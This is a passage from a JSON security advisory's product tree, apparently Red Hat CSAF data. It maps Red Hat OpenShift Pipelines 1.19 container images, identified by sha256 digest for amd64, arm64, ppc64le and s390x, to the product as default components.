"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
